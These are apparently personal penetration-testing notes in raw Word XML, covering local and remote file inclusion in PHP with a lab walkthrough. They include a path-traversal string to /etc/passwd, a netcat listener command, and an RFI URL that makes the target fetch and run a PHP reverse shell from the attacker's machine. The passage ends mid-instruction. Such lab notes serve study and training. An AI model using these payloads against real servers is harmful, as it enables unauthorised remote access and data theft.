      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the source code of the PHP file will be displayed. On the other hand, when dealing with a file inclusion vulnerability, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file will be executed instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ldnibm5l03n5" w:id="231"/>
      <w:bookmarkEnd w:id="231"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Responder (Tier 2 Starting Point HTB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local File Inclusion (LFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: LFI or Local File Inclusion occurs when an attacker is able to get a website to include a file that was not intended to be an option for this application. A common example is when an application uses the path to a file as input in the URL. If the application treats this input as trusted, and the required sanitary checks are not performed on this input, then the attacker can exploit it by using the ../ string in the inputted file name and eventually view sensitive files in the local file system. In some limited cases, an LFI can lead to code execution as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote File Inclusion (RFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: RFI or Remote File Inclusion is similar to LFI but in this case it is possible for an attacker to load a remote file on the host using protocols like HTTP, FTP etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You often need </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be enabled in order to do it on PHP site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI vs. RFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: LFI is using files that are already stored on the web server. RFI is being able to upload your own files and execute those files on the web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: The working directory is often </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default. So that's why we doing something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C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05">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_40zvdj3piq73" w:id="232"/>
      <w:bookmarkEnd w:id="232"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An example of RFI was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId551">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Slort</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice for windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We tried accessing a file in our Kali using the URL and we got requests back on our python host listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then hosted a reverse shell and started listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo rlwrap nc -lvnp 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then sent RFI payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/phpreverseshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="711200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="376" name="image386.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image386.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId552"/>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1C13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From phpinfo.php, we can see that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is on and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are on, meaning we can do RFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C17">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to test for RFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nc -lvnp 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next we try to put our Kali tun0 IP address and a made up request in the URL bar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="469900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="513" name="image499.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image499.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId553"/>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1C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1435100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36" name="image36.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image36.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55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1C1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we should get a GET request back on our listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means RFI is possible!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C1F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit RFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First create rev shell</w:t>
      </w:r>
    </w:p>
